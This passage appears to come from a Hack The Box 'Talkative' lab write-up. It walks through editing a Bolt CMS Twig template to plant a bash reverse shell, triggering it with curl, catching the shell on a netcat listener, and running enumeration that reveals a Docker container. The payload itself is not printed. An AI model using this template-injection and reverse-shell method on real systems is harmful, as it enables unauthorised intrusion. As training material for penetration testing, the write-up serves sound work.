RCE via SSTi
Although the target Bolt CMS instance turned out to be not vulnerable by itself according to the version information, RCE can be achieved via SSTI this article goes step-by-step
Heading over to Main Configuration
I need to check the template(theme) file used here; base-2021
Now heading over to Biew & edit templates
Then I will select the corresponding template file; base-2021
then there is the index.twig file, which is the actual template file for the twig (PHP) engine
This is the file that I want to inject codes to
I will then inject a simple bash reverse shell into it and save the changes
The popup notification confirms the save
All that is left is to clear the cache so that the changes would take effect
┌──(kali㉿kali)-[~/archive/htb/labs/talkative]
└─$ curl -s http://talkative.htb/Upon accessing the website as a regular user, the malicious template would execute, resulting a reverse shell to Kali
┌──(kali㉿kali)-[~/archive/htb/labs/talkative]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.155] 59044
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@2f9b5795d152:/var/www/talkative.htb/bolt/public$ whoami
whoami
www-data
www-data@2f9b5795d152:/var/www/talkative.htb/bolt/public$ hostname
hostname
2f9b5795d152
www-data@2f9b5795d152:/var/www/talkative.htb/bolt/public$ ifconfig
ifconfig
bash: ifconfig: command not found
www-data@2f9b5795d152:/var/www/talkative.htb/bolt/public$ ip a
ip a
bash: ip: command not foundAs expected, a shell session is opened Interesting thing is that I am, once again, unable to execute network-related commands I might be inside another Docker container again.
www-data@2f9b5795d152:/var/www/talkative.htb/bolt/public$ ls -la /
total 80
drwxr-xr-x 1 root root 4096 jun 8 11:24 .
drwxr-xr-x 1 root root 4096 jun 8 11:24 ..
-rwxr-xr-x 1 root root 0 jun 8 11:24 .dockerenv
drwxr-xr-x 1 root root 4096 Mar 6 2022 bin
drwxr-xr-x 2 root root 4096 Dec 11 2021 boot
drwxr-xr-x 5 root root 340 jun 8 11:24 dev
drwxr-xr-x 1 root root 4096 jun 8 11:24 etc
drwxr-xr-x 2 root root 4096 Dec 11 2021 home
drwxr-xr-x 1 root root 4096 Mar 1 2022 lib
drwxr-xr-x 2 root root 4096 Feb 28 2022 lib64
drwxr-xr-x 2 root root 4096 Feb 28 2022 media
drwxr-xr-x 2 root root 4096 Feb 28 2022 mnt
drwxr-xr-x 2 root root 4096 Feb 28 2022 opt
dr-xr-xr-x 417 root root 0 jun 8 11:24 proc
drwx------ 1 root root 4096 Mar 6 2022 root
drwxr-xr-x 1 root root 4096 Mar 1 2022 run
drwxr-xr-x 1 root root 4096 Mar 1 2022 sbin
drwxr-xr-x 2 root root 4096 Feb 28 2022 srv
dr-xr-xr-x 13 root root 0 jun 8 11:24 sys
drwxrwxrwt 1 root root 4096 jun 8 14:59 tmp
drwxr-xr-x 1 root root 4096 Feb 28 2022 usr
drwxr-xr-x 1 root root 4096 Mar 1 2022 varThe .dockerenv file present in the system root directory confirms it.
I would need to enumerate the current environment in order to breakout of it